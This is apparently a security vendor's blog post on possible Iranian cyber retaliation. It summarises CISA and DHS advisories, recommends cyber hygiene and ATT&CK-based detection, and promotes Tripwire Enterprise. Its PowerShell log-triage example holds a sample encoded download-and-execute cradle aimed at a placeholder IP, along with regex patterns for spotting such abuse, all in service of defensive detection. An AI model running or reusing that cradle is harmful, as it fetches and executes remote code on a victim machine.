Following the recent U.S. operation in Iraq which resulted in the killing of Iranian General Qassem Soleimani, Iran warned that it will retaliate. Although the international community and both involved countries have taken steps to deescalate the crisis, it is always prudent to stay alert and continually update your cybersecurity programs regardless of whether the opponent is a state actor or just a common cybercriminal. That is the key message of two security bulletins issued by the Cybersecurity and Infrastructure Security Agency (CISA) and the DHS National Terrorism Advisory System. More specifically, CISA recommends that organizations adopt a state of heightened awareness, increase organizational vigilance, confirm reporting processes, and exercise organizational incident response plans. At the same time, DHS recommends that organizations be prepared for cyber disruptions, suspicious emails, and network delays and that they implement basic cyber hygiene practices.
Background Information on Iranian Cyber Activity
DHS notes that “at this time we have no information indicating a specific, credible threat to the Homeland.” However, “Iran is capable, at a minimum, of carrying out attacks with temporary disruptive effects against critical infrastructure in the United States,” states the DHS security bulletin. Further, CISA states that Iran continues “to engage in more “conventional” activities ranging from website defacement, distributed denial of service (DDoS) attacks, and theft of personally identifiable information (PII), but they have also demonstrated a willingness to push the boundaries of their activities, which include destructive wiper malware and, potentially, cyber-enabled kinetic attacks.” Offensive cyber operations targeting a variety of industries and organizations, including financial services, energy, government facilities, chemical, healthcare, critical manufacturing, communications, and the defense industrial base, have been attributed or allegedly attributed to the Iranian government, says the CISA alert bulletin. As outlined in the bulletin, the most notable high-profile attacks attributed to Iran are the following:
- Late 2011 to mid-2013: DDoS attacks against 46 victims, primarily in the U.S. financial sector, which prevented customers from accessing their accounts and cost the banks millions of dollars in remediation.
- August/September 2013: Security breach at a critical infrastructure facility. An Iranian was accused of illegally accessing the Supervisory Control and Data Acquisition (SCADA) systems of the Bowman Dam located in Rye, New York, and obtaining information regarding the status and operation of the dam.
- February 2014: Breach of Sands Las Vegas Corporation in Las Vegas where customer data including credit card details, Social Security Numbers, and driver’s license numbers were stolen and, according to a Bloomberg report, some computers were wiped.
- 2013 to 2017: Nine Iranian nationals allegedly stole more than 31 terabytes of documents and data from “144 U.S. universities, 176 universities across 21 foreign countries, 47 domestic and foreign private sector companies, the U.S. Department of Labor, the Federal Energy Regulatory Commission, the State of Hawaii, the State of Indiana, the United Nations, and the United Nations Children’s Fund.”
As Kate O'Flaherty writes in her article on Forbes, some feel that cyber operations are not a viable retaliation option because it “is not a strong enough revenge message for the Iranian people.” James Shires, Assistant Professor at the Institute for Security and Global Affairs, University of Leiden and non-resident research fellow with the Cyber Project at the Belfer Center for Science and International Affairs, Harvard Kennedy School, is one of them.
It remains to be seen whether Iran will indeed use cyber-attacks to retaliate against the United States.
How to Mitigate Threats
That uncertainty doesn’t mean organizations can’t take steps to strengthen their digital security in general. Regardless of whether the threat comes from Iran, from any other state actor, or from your next-door criminal, it is always advisable to be prepared and vigilant. The headlines are awash with news of security breaches and incidents involving all kinds of organizations, from critical infrastructure to schools, hospitals, and bicycle manufacturers. Being negligent or ignorant of the risk is not a wise thing to do. To be in line with the CISA and DHS general recommendations, organizations should discuss and set aside budget for employee training, awareness, and incident response planning. Apart from cultivating a security culture within your organization, it is important to take advantage of the available threat intelligence and prepare yourself accordingly. CISA has provided recommendations that span from basic hygiene practices to mitigation and detection of known Iran-attributed APT techniques. Your basic cyber hygiene practices should include the following:
- Disable all unnecessary ports and protocols.
- Enhance monitoring of network and email traffic.
- Patch externally facing equipment.
- Log and limit usage of PowerShell.
- Ensure backups are up to date and stored in an easily retrievable location.
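Two of the hygiene items above, enhanced monitoring and logging of PowerShell usage, only pay off if someone actually reads the logs. The following is an added example, not code from the original post, from CISA, or from Tripwire, of a small triage script that scores constructed records modelled on Windows PowerShell script block logging (Event ID 4104). The sample events, the indicator patterns, and the approved-user policy are all assumptions made for the illustration; the encoded command is generated in the script so the decoder path is exercised.

```python
import base64
import re

# --- Constructed sample data (not real logs from any organization) ----------
# Each record mirrors the fields you would pull from a PowerShell 4104 event:
# timestamp, host, user, and the script block text that was executed.
def _encode_ps(command: str) -> str:
    """Encode text the way PowerShell's -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"time": "2020-01-08T09:12:01Z", "host": "WS-014", "user": "CORP\\alice",
     "script": "Get-ChildItem C:\\Reports | Measure-Object"},
    {"time": "2020-01-08T09:15:44Z", "host": "WS-014", "user": "CORP\\alice",
     "script": "powershell.exe -NoProfile -EncodedCommand "
               + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/x')")},
    {"time": "2020-01-08T10:00:00Z", "host": "ADM-01", "user": "CORP\\ops_admin",
     "script": "Invoke-WebRequest https://updates.example.com/patch.msi -OutFile C:\\Temp\\patch.msi"},
    {"time": "2020-01-08T10:07:30Z", "host": "SRV-DB2", "user": "CORP\\svc_backup",
     "script": "Backup-SqlDatabase -ServerInstance . -Database Sales"},
]

# Hypothetical policy for "limit usage of PowerShell": only these accounts are approved.
APPROVED_POWERSHELL_USERS = {"CORP\\ops_admin", "CORP\\svc_backup"}

# Indicators commonly used by defenders to spot PowerShell abuse. Hits are scored,
# not blocked, so a legitimate admin download produces a medium finding, not an outage.
INDICATORS = {
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "noprofile_or_hidden": re.compile(r"-(?:nop|noprofile|w(?:indowstyle)?\s+hidden|ep\s+bypass)\b", re.I),
}


def decode_encoded_command(script: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    match = INDICATORS["encoded_command"].search(script)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> dict:
    """Score one record, scanning both the raw script block and any decoded payload."""
    texts = [event["script"]]
    decoded = decode_encoded_command(event["script"])
    if decoded is not None:
        texts.append(decoded)
    hits = sorted({name for name, rx in INDICATORS.items()
                   for text in texts if rx.search(text)})
    unapproved = event["user"] not in APPROVED_POWERSHELL_USERS
    if "encoded_command" in hits or len(hits) >= 2 or (unapproved and hits):
        severity = "high"
    elif hits:
        severity = "medium"
    elif unapproved:
        severity = "low"   # policy violation only; worth a ticket, not a page-out
    else:
        severity = "none"
    return {"time": event["time"], "host": event["host"], "user": event["user"],
            "hits": hits, "decoded": decoded, "unapproved_user": unapproved,
            "severity": severity}


def triage(events) -> list:
    """Return findings ordered most severe first, for the analyst queue."""
    order = {"high": 0, "medium": 1, "low": 2, "none": 3}
    return sorted((analyze_event(e) for e in events), key=lambda f: order[f["severity"]])


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"[{finding['severity']:>6}] {finding['host']} {finding['user']} "
              f"hits={finding['hits']} decoded={finding['decoded']!r}")
```

The point of decoding the payload before matching is that an encoded command hides every other indicator from a naive string search; the event log you enable is only as useful as the normalization you apply before looking at it.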
Moving beyond basic fortification of your organization, it is highly advisable to employ mitigation and detection best practices to mitigate known APT techniques. “Advanced Persistent Threat groups, by definition, are going to be more funded and skilled than other adversaries seen on the internet,” says Travis Smith, Manager, Security Compliance Solutions at Tripwire. As APT activities become more and more difficult to track and detect, there is an emerging need to raise the detection capabilities of organizations. “There’s a common misperception that attackers only need to be right once to get in, while defenders need to be right all the time,” says Smith. “In fact, good defenders only need to be right once to track down the most sophisticated attackers. A sophisticated attack is going to chain together multiple techniques in order to achieve the adversary’s goal. This means there are many moving parts and points of contact with IT systems which are prime targets to spot adversarial behaviors. Raising detection maturity from looking for tools to looking for techniques increases the chances of detection.” Luckily, attackers are humans, and therefore, their techniques can be predicted by taking advantage of actionable threat intelligence, which can help us be prepared and make the attackers’ lives difficult. What better tool to use than MITRE ATT&CK? In fact, even the CISA security bulletin includes indicators based on the MITRE ATT&CK framework. The framework is a curated knowledge base and model for cyber adversary behavior which reflects the various phases of an adversary’s lifecycle and the platforms they are known to target. “By leveraging something like MITRE ATT&CK, which describes in detail multiple different techniques, we can begin tracing how an attacker may target our systems,” notes Smith. “You don’t need to have perfect coverage of every technique; in fact, it is probably cost-prohibitive to do so.
Having detection capabilities across multiple techniques will be good enough for an attacker to trip over.” ATT&CK can help organizations quickly detect cyber threats and identify and categorize cyber adversary behaviors. This insight allows a tailored response to a cyber breach and a recovery plan specific to the breach, saving valuable time and resources. “By tracking APT groups, we can know what techniques they want to leverage more heavily. We can place mitigating steps for those techniques, which can force the attacker out of their comfort zone. When this happens, an attacker can make mistakes. When an attacker makes a mistake, it shifts the balance of power in favor of the defender,” concludes Travis Smith. It is never a bad idea to use current events to ramp up attention being paid to cybersecurity. Tripwire Enterprise can identify the tactics, techniques and procedures (TTPs) outlined in MITRE’s ATT&CK model and can help your organization detect and protect against behaviors associated with cybercrime. Using Tripwire Enterprise, organizations can build better preventative measures and be in a position to identify a breach sooner by focusing on the behaviors of cyber attackers instead of just on the specific tools or malware they use.
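Smith's two arguments above, that you track which techniques a group leans on and then check how many of them your detections would trip over, are easy to turn into a repeatable coverage check. The following is an added example, not code from the original post, from Tripwire Enterprise, or from MITRE: it maps a hypothetical detection-rule inventory onto ATT&CK technique IDs, scores it against a hypothetical group profile, and walks a constructed intrusion chain to count the points where a defender "only needs to be right once". The technique IDs and names are genuine MITRE ATT&CK identifiers; the group profile, the rules, and the chain are constructed for the illustration and describe no real group or product.

```python
from collections import defaultdict

# Genuine ATT&CK technique IDs and names; the selection is ours, not the bulletin's.
TECHNIQUES = {
    "T1566.001": "Phishing: Spearphishing Attachment",
    "T1059.001": "Command and Scripting Interpreter: PowerShell",
    "T1078": "Valid Accounts",
    "T1003": "OS Credential Dumping",
    "T1021.001": "Remote Services: Remote Desktop Protocol",
    "T1071.001": "Application Layer Protocol: Web Protocols",
    "T1485": "Data Destruction",
    "T1491": "Defacement",
}

# Hypothetical group profile: weight = how heavily the tracked group is assumed to
# lean on each technique. Not derived from any real group's ATT&CK page.
TRACKED_GROUP_PROFILE = {
    "T1566.001": 5, "T1059.001": 4, "T1485": 4, "T1078": 3,
    "T1003": 3, "T1021.001": 2, "T1071.001": 2, "T1491": 1,
}

# Hypothetical detection-rule inventory, each rule tagged with the technique it detects.
DETECTION_RULES = [
    {"id": "R-001", "name": "PowerShell encoded command", "technique": "T1059.001", "source": "PowerShell 4104"},
    {"id": "R-002", "name": "Office app spawns script host", "technique": "T1566.001", "source": "Sysmon 1"},
    {"id": "R-003", "name": "LSASS handle from non-system process", "technique": "T1003", "source": "Sysmon 10"},
    {"id": "R-004", "name": "Mass file overwrite by one process", "technique": "T1485", "source": "File integrity monitoring"},
    {"id": "R-005", "name": "Fixed-interval HTTP beaconing", "technique": "T1071.001", "source": "Proxy logs"},
]

# Constructed intrusion chain in the order an attacker would have to execute it.
SAMPLE_INTRUSION_CHAIN = ["T1566.001", "T1059.001", "T1078", "T1021.001", "T1485"]


def coverage_by_technique(rules) -> dict:
    """Map each technique ID to the rule IDs that claim to detect it."""
    cov = defaultdict(list)
    for rule in rules:
        cov[rule["technique"]].append(rule["id"])
    return dict(cov)


def coverage_report(profile: dict, rules) -> dict:
    """Score rule coverage against a group profile; gaps come back heaviest first."""
    cov = coverage_by_technique(rules)
    covered = {t: cov[t] for t in profile if t in cov}
    gaps = sorted((t for t in profile if t not in cov), key=lambda t: -profile[t])
    total_weight = sum(profile.values())
    covered_weight = sum(profile[t] for t in covered)
    return {
        "covered": covered,
        "gaps": gaps,
        "weighted_coverage": covered_weight / total_weight,   # weighted by how often the group uses it
        "technique_coverage": len(covered) / len(profile),    # plain fraction of techniques covered
    }


def detection_opportunities(chain, rules) -> list:
    """For each step of an attack chain, list the rules that would fire at that step."""
    cov = coverage_by_technique(rules)
    return [(technique, cov.get(technique, [])) for technique in chain]


if __name__ == "__main__":
    report = coverage_report(TRACKED_GROUP_PROFILE, DETECTION_RULES)
    print(f"weighted coverage: {report['weighted_coverage']:.0%}, "
          f"technique coverage: {report['technique_coverage']:.0%}")
    for technique in report["gaps"]:
        print(f"  GAP  {technique:<10} {TECHNIQUES[technique]} (weight {TRACKED_GROUP_PROFILE[technique]})")
    for technique, rules in detection_opportunities(SAMPLE_INTRUSION_CHAIN, DETECTION_RULES):
        status = "detectable" if rules else "blind spot"
        print(f"  step {technique:<10} {status:<10} {rules}")
```

The weighted figure is the one to track over time: closing the heaviest gap first (here, Valid Accounts) buys more than adding a second rule for a technique already covered, and the chain walk shows that an attacker who must cross five steps meets a detection at three of them even with a deliberately small rule set.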